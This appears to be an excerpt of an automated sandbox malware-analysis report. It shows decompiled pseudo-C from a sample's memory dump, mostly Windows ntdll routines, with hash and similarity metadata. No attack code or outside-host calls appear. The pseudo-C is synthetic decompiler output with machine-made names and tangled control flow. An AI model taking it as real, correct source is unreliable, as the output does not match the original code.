                                        					_t108 = 0;
                                        					_t109 = 0;
                                        					_t95 = 0;
                                        					__eflags = 0;
                                        					while(1) {
                                        						__eflags = _t95 - 0x200;
                                        						if(_t95 >= 0x200) {
                                        							break;
                                        						}
                                        						E016ED000(0x80);
                                        						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                        						_t108 = _t115;
                                        						_t95 = _t95 - 0xffffff80;
                                        						_t17 = _t114 - 4;
                                        						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                        						__eflags =  *_t17;
                                        						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                        						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                        						_t102 = _t110 + 1;
                                        						do {
                                        							_t85 =  *_t110;
                                        							_t110 = _t110 + 1;
                                        							__eflags = _t85;
                                        						} while (_t85 != 0);
                                        						_t111 = _t110 - _t102;
                                        						_t21 = _t95 - 1; // -129
                                        						_t86 = _t21;
                                        						__eflags = _t111 - _t86;
                                        						if(_t111 > _t86) {
                                        							_t111 = _t86;
                                        						}
                                        						E016EF3E0(_t108, _t106, _t111);
                                        						_t115 = _t115 + 0xc;
                                        						_t103 = _t111 + _t108;
                                        						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                        						_t89 = _t95 - _t111;
                                        						__eflags = _t89;
                                        						_push(0);
                                        						if(_t89 == 0) {
                                        							L15:
                                        							_t109 = 0xc000000d;
                                        							goto L16;
                                        						} else {
                                        							__eflags = _t89 - 0x7fffffff;
                                        							if(_t89 <= 0x7fffffff) {
                                        								L16:
                                        								 *(_t114 - 0x94) = _t109;
                                        								__eflags = _t109;
                                        								if(_t109 < 0) {
                                        									__eflags = _t89;
                                        									if(_t89 != 0) {
                                        										 *_t103 = 0;
                                        									}
                                        									L26:
                                        									 *(_t114 - 0xa0) = _t109;
                                        									 *(_t114 - 4) = 0xfffffffe;
                                        									__eflags = _t109;
                                        									if(_t109 >= 0) {
                                        										L31:
                                        										_t98 = _t108;
                                        										_t39 = _t98 + 1; // 0x1
                                        										_t106 = _t39;
                                        										do {
                                        											_t69 =  *_t98;
                                        											_t98 = _t98 + 1;
                                        											__eflags = _t69;
                                        										} while (_t69 != 0);
                                        										_t99 = _t98 - _t106;
                                        										__eflags = _t99;
                                        										L34:
                                        										_t70 =  *[fs:0x30];
                                        										__eflags =  *((char*)(_t70 + 2));
                                        										if( *((char*)(_t70 + 2)) != 0) {
                                        											L40:
                                        											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                        											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                        											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                        											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                        											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                        											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                        											 *(_t114 - 4) = 1;
                                        											_push(_t114 - 0x74);
                                        											L016FDEF0(_t99, _t106);
                                        											 *(_t114 - 4) = 0xfffffffe;
                                        											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                        											goto L3;
                                        										}
                                        										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                        										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                        											goto L40;
                                        										}
                                        										_push( *((intOrPtr*)(_t114 + 8)));
                                        										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                        										_push(_t99 & 0x0000ffff);
                                        										_push(_t108);
                                        										_push(1);
                                        										_t101 = E016EB280();
                                        										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                        										if( *((char*)(_t114 + 0x14)) == 1) {
                                        											__eflags = _t101 - 0x80000003;
                                        											if(_t101 == 0x80000003) {
                                        												E016EB7E0(1);
                                        												_t101 = 0;
                                        												__eflags = 0;
                                        											}
                                        										}
                                        										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                        										goto L4;
                                        									}
                                        									__eflags = _t109 - 0x80000005;
                                        									if(_t109 == 0x80000005) {
                                        										continue;
                                        									}
                                        									break;
                                        								}
                                        								 *(_t114 - 0x90) = 0;
                                        								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                        								_t91 = E016EE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                        								_t115 = _t115 + 0x10;
                                        								_t104 = _t91;
                                        								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                        								__eflags = _t104;
                                        								if(_t104 < 0) {
                                        									L21:
                                        									_t109 = 0x80000005;
                                        									 *(_t114 - 0x90) = 0x80000005;
                                        									L22:
                                        									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                        									L23:
                                        									 *(_t114 - 0x94) = _t109;
                                        									goto L26;
                                        								}
                                        								__eflags = _t104 - _t92;
                                        								if(__eflags > 0) {
                                        									goto L21;
                                        								}
                                        								if(__eflags == 0) {
                                        									goto L22;
                                        								}
                                        								goto L23;
                                        							}
                                        							goto L15;
                                        						}
                                        					}
                                        					__eflags = _t109;
                                        					if(_t109 >= 0) {
                                        						goto L31;
                                        					}
                                        					__eflags = _t109 - 0x80000005;
                                        					if(_t109 != 0x80000005) {
                                        						goto L31;
                                        					}
                                        					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                        					_t38 = _t95 - 1; // -129
                                        					_t99 = _t38;
                                        					goto L34;
                                        				}
                                        				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                        					__eflags = __edx - 0x65;
                                        					if(__edx != 0x65) {
                                        						goto L2;
                                        					}
                                        					goto L6;
                                        				}
                                        				L2:
                                        				_push( *((intOrPtr*)(_t114 + 8)));
                                        				_push(_t106);
                                        				if(E016EA890() != 0) {
                                        					goto L6;
                                        				}
                                        				goto L3;
                                        			}


                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: _vswprintf_s
                                        • String ID:
                                        • API String ID: 677850445-0
                                        • Opcode ID: 43d1ebd65534e21aa8bae4290dfd9b6b419c0e7b8ed3945f36cc0d609377b2be
                                        • Instruction ID: 1365c882f44923dbcd07d15ebfe4c8c0daf4244d51c77bbc196b0ebfd77fda12
                                        • Opcode Fuzzy Hash: 43d1ebd65534e21aa8bae4290dfd9b6b419c0e7b8ed3945f36cc0d609377b2be
                                        • Instruction Fuzzy Hash: 7751BF71D1035ACEDB32CF688844BAEBBF1AF00710F1042ADDA5AAB2C2D7745A41DB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 76%
                                        			E016CB944(signed int* __ecx, char __edx) {
                                        				signed int _v8;
                                        				signed int _v16;
                                        				signed int _v20;
                                        				char _v28;
                                        				signed int _v32;
                                        				char _v36;
                                        				signed int _v40;
                                        				intOrPtr _v44;
                                        				signed int* _v48;
                                        				signed int _v52;
                                        				signed int _v56;
                                        				intOrPtr _v60;
                                        				intOrPtr _v64;
                                        				intOrPtr _v68;
                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				char _v77;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr* _t65;
                                        				intOrPtr _t67;
                                        				intOrPtr _t68;
                                        				char* _t73;
                                        				intOrPtr _t77;
                                        				intOrPtr _t78;
                                        				signed int _t82;
                                        				intOrPtr _t83;
                                        				void* _t87;
                                        				char _t88;
                                        				intOrPtr* _t89;
                                        				intOrPtr _t91;
                                        				void* _t97;
                                        				intOrPtr _t100;
                                        				void* _t102;
                                        				void* _t107;
                                        				signed int _t108;
                                        				intOrPtr* _t112;
                                        				void* _t113;
                                        				intOrPtr* _t114;
                                        				intOrPtr _t115;
                                        				intOrPtr _t116;
                                        				intOrPtr _t117;
                                        				signed int _t118;
                                        				void* _t130;
                                        
                                        				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                        				_v8 =  *0x179d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                        				_t112 = __ecx;
                                        				_v77 = __edx;
                                        				_v48 = __ecx;
                                        				_v28 = 0;
                                        				_t5 = _t112 + 0xc; // 0x575651ff
                                        				_t105 =  *_t5;
                                        				_v20 = 0;
                                        				_v16 = 0;
                                        				if(_t105 == 0) {
                                        					_t50 = _t112 + 4; // 0x5de58b5b
                                        					_t60 =  *__ecx |  *_t50;
                                        					if(( *__ecx |  *_t50) != 0) {
                                        						 *__ecx = 0;
                                        						__ecx[1] = 0;
                                        						if(E016C7D50() != 0) {
                                        							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        						} else {
                                        							_t65 = 0x7ffe0386;
                                        						}
                                        						if( *_t65 != 0) {
                                        							E01778CD6(_t112);
                                        						}
                                        						_push(0);
                                        						_t52 = _t112 + 0x10; // 0x778df98b
                                        						_push( *_t52);
                                        						_t60 = E016E9E20();
                                        					}
                                        					L20:
                                        					_pop(_t107);
                                        					_pop(_t113);
                                        					_pop(_t87);
                                        					return E016EB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                        				}
                                        				_t8 = _t112 + 8; // 0x8b000cc2
                                        				_t67 =  *_t8;
                                        				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                        				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                        				_t108 =  *(_t67 + 0x14);
                                        				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                        				_t105 = 0x2710;
                                        				asm("sbb eax, edi");
                                        				_v44 = _t88;
                                        				_v52 = _t108;
                                        				_t60 = E016ECE00(_t97, _t68, 0x2710, 0);
                                        				_v56 = _t60;
                                        				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                        					L3:
                                        					 *(_t112 + 0x44) = _t60;
                                        					_t105 = _t60 * 0x2710 >> 0x20;
                                        					 *_t112 = _t88;
                                        					 *(_t112 + 4) = _t108;
                                        					_v20 = _t60 * 0x2710;
                                        					_v16 = _t60 * 0x2710 >> 0x20;
                                        					if(_v77 != 0) {
                                        						L16:
                                        						_v36 = _t88;
                                        						_v32 = _t108;
                                        						if(E016C7D50() != 0) {
                                        							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        						} else {
                                        							_t73 = 0x7ffe0386;
                                        						}
                                        						if( *_t73 != 0) {
                                        							_t105 = _v40;
                                        							E01778F6A(_t112, _v40, _t88, _t108);
                                        						}
                                        						_push( &_v28);
                                        						_push(0);
                                        						_push( &_v36);
                                        						_t48 = _t112 + 0x10; // 0x778df98b
                                        						_push( *_t48);
                                        						_t60 = E016EAF60();
                                        						goto L20;
                                        					} else {
                                        						_t89 = 0x7ffe03b0;
                                        						do {
                                        							_t114 = 0x7ffe0010;
                                        							do {
                                        								_t77 =  *0x1798628; // 0x0
                                        								_v68 = _t77;
                                        								_t78 =  *0x179862c; // 0x0
                                        								_v64 = _t78;
                                        								_v72 =  *_t89;
                                        								_v76 =  *((intOrPtr*)(_t89 + 4));
                                        								while(1) {
                                        									_t105 =  *0x7ffe000c;
                                        									_t100 =  *0x7ffe0008;
                                        									if(_t105 ==  *_t114) {
                                        										goto L8;
                                        									}
                                        									asm("pause");
                                        								}
                                        								L8:
                                        								_t89 = 0x7ffe03b0;
                                        								_t115 =  *0x7ffe03b0;
                                        								_t82 =  *0x7FFE03B4;
                                        								_v60 = _t115;
                                        								_t114 = 0x7ffe0010;
                                        								_v56 = _t82;
                                        							} while (_v72 != _t115 || _v76 != _t82);
                                        							_t83 =  *0x1798628; // 0x0
                                        							_t116 =  *0x179862c; // 0x0
                                        							_v76 = _t116;
                                        							_t117 = _v68;
                                        						} while (_t117 != _t83 || _v64 != _v76);
                                        						asm("sbb edx, [esp+0x24]");
                                        						_t102 = _t100 - _v60 - _t117;
                                        						_t112 = _v48;
                                        						_t91 = _v44;
                                        						asm("sbb edx, eax");
                                        						_t130 = _t105 - _v52;
                                        						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                        							_t88 = _t102 - _t91;
                                        							asm("sbb edx, edi");
                                        							_t108 = _t105;
                                        						} else {
                                        							_t88 = 0;
                                        							_t108 = 0;
                                        						}
                                        						goto L16;
                                        					}
                                        				} else {
                                        					if( *(_t112 + 0x44) == _t60) {
                                        						goto L20;
                                        					}
                                        					goto L3;
                                        				}
                                        			}


                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016CB9A5
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 885266447-0
                                        • Opcode ID: 0e3087ed13c30d6ebc67a16268b07a5201b2d6f35718584467c9f903cf402e11
                                        • Instruction ID: 46401a784403993c435ac173df8404dcf754ff211b1f8a6220229692dea0acd8
                                        • Opcode Fuzzy Hash: 0e3087ed13c30d6ebc67a16268b07a5201b2d6f35718584467c9f903cf402e11
                                        • Instruction Fuzzy Hash: 5B515971A08341CFC720DF6DC88192AFBE5FB89A50F14896EEAC587355D731E845CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 80%
                                        			E016DFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                        				char _v5;
                                        				signed int _v8;
                                        				signed int _v12;
                                        				char _v16;
                                        				char _v17;
                                        				char _v20;
                                        				signed int _v24;
                                        				char _v28;
                                        				char _v32;
                                        				signed int _v40;
                                        				void* __ecx;
                                        				void* __edi;
                                        				void* __ebp;
                                        				signed int _t73;
                                        				intOrPtr* _t75;
                                        				signed int _t77;
                                        				signed int _t79;
                                        				signed int _t81;
                                        				intOrPtr _t83;
                                        				intOrPtr _t85;
                                        				intOrPtr _t86;
                                        				signed int _t91;
                                        				signed int _t94;
                                        				signed int _t95;
                                        				signed int _t96;
                                        				signed int _t106;
                                        				signed int _t108;
                                        				signed int _t114;
                                        				signed int _t116;
                                        				signed int _t118;
                                        				signed int _t122;
                                        				signed int _t123;
                                        				void* _t129;
                                        				signed int _t130;
                                        				void* _t132;
                                        				intOrPtr* _t134;
                                        				signed int _t138;
                                        				signed int _t141;
                                        				signed int _t147;
                                        				intOrPtr _t153;
                                        				signed int _t154;
                                        				signed int _t155;
                                        				signed int _t170;
                                        				void* _t174;
                                        				signed int _t176;
                                        				signed int _t177;
                                        
                                        				_t129 = __ebx;
                                        				_push(_t132);
                                        				_push(__esi);
                                        				_t174 = _t132;
                                        				_t73 =  !( *( *(_t174 + 0x18)));
                                        				if(_t73 >= 0) {
                                        					L5:
                                        					return _t73;
                                        				} else {
                                        					E016BEEF0(0x1797b60);
                                        					_t134 =  *0x1797b84; // 0x77997b80
                                        					_t2 = _t174 + 0x24; // 0x24
                                        					_t75 = _t2;
                                        					if( *_t134 != 0x1797b80) {
                                        						_push(3);
                                        						asm("int 0x29");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						_push(0x1797b60);
                                        						_t170 = _v8;
                                        						_v28 = 0;
                                        						_v40 = 0;
                                        						_v24 = 0;
                                        						_v17 = 0;
                                        						_v32 = 0;
                                        						__eflags = _t170 & 0xffff7cf2;
                                        						if((_t170 & 0xffff7cf2) != 0) {
                                        							L43:
                                        							_t77 = 0xc000000d;
                                        						} else {
                                        							_t79 = _t170 & 0x0000000c;
                                        							__eflags = _t79;
                                        							if(_t79 != 0) {
                                        								__eflags = _t79 - 0xc;
                                        								if(_t79 == 0xc) {
                                        									goto L43;
                                        								} else {
                                        									goto L9;
                                        								}
                                        							} else {
                                        								_t170 = _t170 | 0x00000008;
                                        								__eflags = _t170;
                                        								L9:
                                        								_t81 = _t170 & 0x00000300;
                                        								__eflags = _t81 - 0x300;
                                        								if(_t81 == 0x300) {
                                        									goto L43;
                                        								} else {
                                        									_t138 = _t170 & 0x00000001;
                                        									__eflags = _t138;
                                        									_v24 = _t138;
                                        									if(_t138 != 0) {
                                        										__eflags = _t81;
                                        										if(_t81 != 0) {
                                        											goto L43;
                                        										} else {
                                        											goto L11;
                                        										}
                                        									} else {
                                        										L11:
                                        										_push(_t129);
                                        										_t77 = E016B6D90( &_v20);
                                        										_t130 = _t77;
                                        										__eflags = _t130;
                                        										if(_t130 >= 0) {
                                        											_push(_t174);
                                        											__eflags = _t170 & 0x00000301;
                                        											if((_t170 & 0x00000301) == 0) {
                                        												_t176 = _a8;
                                        												__eflags = _t176;
                                        												if(__eflags == 0) {
                                        													L64:
                                        													_t83 =  *[fs:0x18];
                                        													_t177 = 0;
                                        													__eflags =  *(_t83 + 0xfb8);
                                        													if( *(_t83 + 0xfb8) != 0) {
                                        														E016B76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                        														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                        													}
                                        													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                        													goto L15;
                                        												} else {
                                        													asm("sbb edx, edx");
                                        													_t114 = E01748938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                        													__eflags = _t114;
                                        													if(_t114 < 0) {
                                        														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                        														E016AB150();
                                        													}
                                        													_t116 = E01746D81(_t176,  &_v16);
                                        													__eflags = _t116;
                                        													if(_t116 >= 0) {
                                        														__eflags = _v16 - 2;
                                        														if(_v16 < 2) {
                                        															L56:
                                        															_t118 = E016B75CE(_v20, 5, 0);
                                        															__eflags = _t118;
                                        															if(_t118 < 0) {
                                        																L67:
                                        																_t130 = 0xc0000017;
                                        																goto L32;
                                        															} else {
                                        																__eflags = _v12;
                                        																if(_v12 == 0) {
                                        																	goto L67;
                                        																} else {
                                        																	_t153 =  *0x1798638; // 0x0
                                        																	_t122 = L016B38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                        																	_t154 = _v12;
                                        																	_t130 = _t122;
                                        																	__eflags = _t130;
                                        																	if(_t130 >= 0) {
                                        																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                        																		__eflags = _t123;
                                        																		if(_t123 != 0) {
                                        																			_t155 = _a12;
                                        																			__eflags = _t155;
                                        																			if(_t155 != 0) {
                                        																				 *_t155 = _t123;
                                        																			}
                                        																			goto L64;
                                        																		} else {
                                        																			E016B76E2(_t154);
                                        																			goto L41;
                                        																		}
                                        																	} else {
                                        																		E016B76E2(_t154);
                                        																		_t177 = 0;
                                        																		goto L18;
                                        																	}
                                        																}
                                        															}
                                        														} else {
                                        															__eflags =  *_t176;
                                        															if( *_t176 != 0) {
                                        																goto L56;
                                        															} else {
                                        																__eflags =  *(_t176 + 2);
                                        																if( *(_t176 + 2) == 0) {
                                        																	goto L64;
                                        																} else {
                                        																	goto L56;
                                        																}
                                        															}
                                        														}
                                        													} else {
                                        														_t130 = 0xc000000d;
                                        														goto L32;
                                        													}
                                        												}
                                        												goto L35;
                                        											} else {
                                        												__eflags = _a8;
                                        												if(_a8 != 0) {
                                        													_t77 = 0xc000000d;
                                        												} else {
                                        													_v5 = 1;
                                        													L016DFCE3(_v20, _t170);
                                        													_t177 = 0;
                                        													__eflags = 0;
                                        													L15:
                                        													_t85 =  *[fs:0x18];
                                        													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                        													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                        														L18:
                                        														__eflags = _t130;
                                        														if(_t130 != 0) {
                                        															goto L32;
                                        														} else {
                                        															__eflags = _v5 - _t130;
                                        															if(_v5 == _t130) {
                                        																goto L32;
                                        															} else {
                                        																_t86 =  *[fs:0x18];
                                        																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                        																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                        																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                        																}
                                        																__eflags = _t177;
                                        																if(_t177 == 0) {
                                        																	L31:
                                        																	__eflags = 0;
                                        																	L016B70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                        																	goto L32;
                                        																} else {
                                        																	__eflags = _v24;
                                        																	_t91 =  *(_t177 + 0x20);
                                        																	if(_v24 != 0) {
                                        																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                        																		goto L31;
                                        																	} else {
                                        																		_t141 = _t91 & 0x00000040;
                                        																		__eflags = _t170 & 0x00000100;
                                        																		if((_t170 & 0x00000100) == 0) {
                                        																			__eflags = _t141;
                                        																			if(_t141 == 0) {
                                        																				L74:
                                        																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                        																				goto L27;
                                        																			} else {
                                        																				_t177 = E016DFD22(_t177);
                                        																				__eflags = _t177;
                                        																				if(_t177 == 0) {
                                        																					goto L42;
                                        																				} else {
                                        																					_t130 = E016DFD9B(_t177, 0, 4);
                                        																					__eflags = _t130;
                                        																					if(_t130 != 0) {
                                        																						goto L42;
                                        																					} else {
                                        																						_t68 = _t177 + 0x20;
                                        																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                        																						__eflags =  *_t68;
                                        																						_t91 =  *(_t177 + 0x20);
                                        																						goto L74;
                                        																					}
                                        																				}
                                        																			}
                                        																			goto L35;
                                        																		} else {
                                        																			__eflags = _t141;
                                        																			if(_t141 != 0) {
                                        																				_t177 = E016DFD22(_t177);
                                        																				__eflags = _t177;
                                        																				if(_t177 == 0) {
                                        																					L42:
                                        																					_t77 = 0xc0000001;
                                        																					goto L33;
                                        																				} else {
                                        																					_t130 = E016DFD9B(_t177, 0, 4);
                                        																					__eflags = _t130;
                                        																					if(_t130 != 0) {
                                        																						goto L42;
                                        																					} else {
                                        																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                        																						_t91 =  *(_t177 + 0x20);
                                        																						goto L26;
                                        																					}
                                        																				}
                                        																				goto L35;
                                        																			} else {
                                        																				L26:
                                        																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                        																				__eflags = _t94;
                                        																				L27:
                                        																				 *(_t177 + 0x20) = _t94;
                                        																				__eflags = _t170 & 0x00008000;
                                        																				if((_t170 & 0x00008000) != 0) {
                                        																					_t95 = _a12;
                                        																					__eflags = _t95;
                                        																					if(_t95 != 0) {
                                        																						_t96 =  *_t95;
                                        																						__eflags = _t96;
                                        																						if(_t96 != 0) {
                                        																							 *((short*)(_t177 + 0x22)) = 0;
                                        																							_t40 = _t177 + 0x20;
                                        																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                        																							__eflags =  *_t40;
                                        																						}
                                        																					}
                                        																				}
                                        																				goto L31;
                                        																			}
                                        																		}
                                        																	}
                                        																}
                                        															}
                                        														}
                                        													} else {
                                        														_t147 =  *( *[fs:0x18] + 0xfc0);
                                        														_t106 =  *(_t147 + 0x20);
                                        														__eflags = _t106 & 0x00000040;
                                        														if((_t106 & 0x00000040) != 0) {
                                        															_t147 = E016DFD22(_t147);
                                        															__eflags = _t147;
                                        															if(_t147 == 0) {
                                        																L41:
                                        																_t130 = 0xc0000001;
                                        																L32:
                                        																_t77 = _t130;
                                        																goto L33;
                                        															} else {
                                        																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                        																_t106 =  *(_t147 + 0x20);
                                        																goto L17;
                                        															}
                                        															goto L35;
                                        														} else {
                                        															L17:
                                        															_t108 = _t106 | 0x00000080;
                                        															__eflags = _t108;
                                        															 *(_t147 + 0x20) = _t108;
                                        															 *( *[fs:0x18] + 0xfc0) = _t147;
                                        															goto L18;
                                        														}
                                        													}
                                        												}
                                        											}
                                        											L33:
                                        										}
                                        									}
                                        								}
                                        							}
                                        						}
                                        						L35:
                                        						return _t77;
                                        					} else {
                                        						 *_t75 = 0x1797b80;
                                        						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                        						 *_t134 = _t75;
                                        						 *0x1797b84 = _t75;
                                        						_t73 = E016BEB70(_t134, 0x1797b60);
                                        						if( *0x1797b20 != 0) {
                                        							_t73 =  *( *[fs:0x30] + 0xc);
                                        							if( *((char*)(_t73 + 0x28)) == 0) {
                                        								_t73 = E016BFF60( *0x1797b20);
                                        							}
                                        						}
                                        						goto L5;
                                        					}
                                        				}
                                        			}


                                        Strings
                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0171BE0F
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                        • API String ID: 0-865735534
                                        • Opcode ID: b9cea9c72bbf677bfcf1e1288b0c1ead9aa8db2fb0ee5e9c346b31ad547e4578
                                        • Instruction ID: 683ba233ebc0a42b9c66e12b318441b7da1047f2dcb6902aa468c6c27cb3573f
                                        • Opcode Fuzzy Hash: b9cea9c72bbf677bfcf1e1288b0c1ead9aa8db2fb0ee5e9c346b31ad547e4578
                                        • Instruction Fuzzy Hash: D5A1D071E006068BEB25DB6CCC50BAAB7B5AF48720F0445ADE947DB785DB30D9478B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 63%
                                        			E016A2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                        				signed char _v8;
                                        				signed int _v12;
                                        				signed int _v16;
                                        				signed int _v20;
                                        				signed int _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				signed int _v52;
                                        				void* __esi;
                                        				void* __ebp;
                                        				intOrPtr _t55;
                                        				signed int _t57;
                                        				signed int _t58;
                                        				char* _t62;
                                        				signed char* _t63;
                                        				signed char* _t64;
                                        				signed int _t67;
                                        				signed int _t72;
                                        				signed int _t77;
                                        				signed int _t78;
                                        				signed int _t88;
                                        				intOrPtr _t89;
                                        				signed char _t93;
                                        				signed int _t97;
                                        				signed int _t98;
                                        				signed int _t102;
                                        				signed int _t103;
                                        				intOrPtr _t104;
                                        				signed int _t105;
                                        				signed int _t106;
                                        				signed char _t109;
                                        				signed int _t111;
                                        				void* _t116;
                                        
                                        				_t102 = __edi;
                                        				_t97 = __edx;
                                        				_v12 = _v12 & 0x00000000;
                                        				_t55 =  *[fs:0x18];
                                        				_t109 = __ecx;
                                        				_v8 = __edx;
                                        				_t86 = 0;
                                        				_v32 = _t55;
                                        				_v24 = 0;
                                        				_push(__edi);
                                        				if(__ecx == 0x1795350) {
                                        					_t86 = 1;
                                        					_v24 = 1;
                                        					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                        				}
                                        				_t103 = _t102 | 0xffffffff;
                                        				if( *0x1797bc8 != 0) {
                                        					_push(0xc000004b);
                                        					_push(_t103);
                                        					E016E97C0();
                                        				}
                                        				if( *0x17979c4 != 0) {
                                        					_t57 = 0;
                                        				} else {
                                        					_t57 = 0x17979c8;
                                        				}
                                        				_v16 = _t57;
                                        				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                        					_t93 = _t109;
                                        					L23();
                                        				}
                                        				_t58 =  *_t109;
                                        				if(_t58 == _t103) {
                                        					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                        					_t58 = _t103;
                                        					if(__eflags == 0) {
                                        						_t93 = _t109;
                                        						E016D1624(_t86, __eflags);
                                        						_t58 =  *_t109;
                                        					}
                                        				}
                                        				_v20 = _v20 & 0x00000000;
                                        				if(_t58 != _t103) {
                                        					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                        				}
                                        				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                        				_t88 = _v16;
                                        				_v28 = _t104;
                                        				L9:
                                        				while(1) {
                                        					if(E016C7D50() != 0) {
                                        						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                        					} else {
                                        						_t62 = 0x7ffe0382;
                                        					}
                                        					if( *_t62 != 0) {
                                        						_t63 =  *[fs:0x30];
                                        						__eflags = _t63[0x240] & 0x00000002;
                                        						if((_t63[0x240] & 0x00000002) != 0) {
                                        							_t93 = _t109;
                                        							E0173FE87(_t93);
                                        						}
                                        					}
                                        					if(_t104 != 0xffffffff) {
                                        						_push(_t88);
                                        						_push(0);
                                        						_push(_t104);
                                        						_t64 = E016E9520();
                                        						goto L15;
                                        					} else {
                                        						while(1) {
                                        							_t97 =  &_v8;
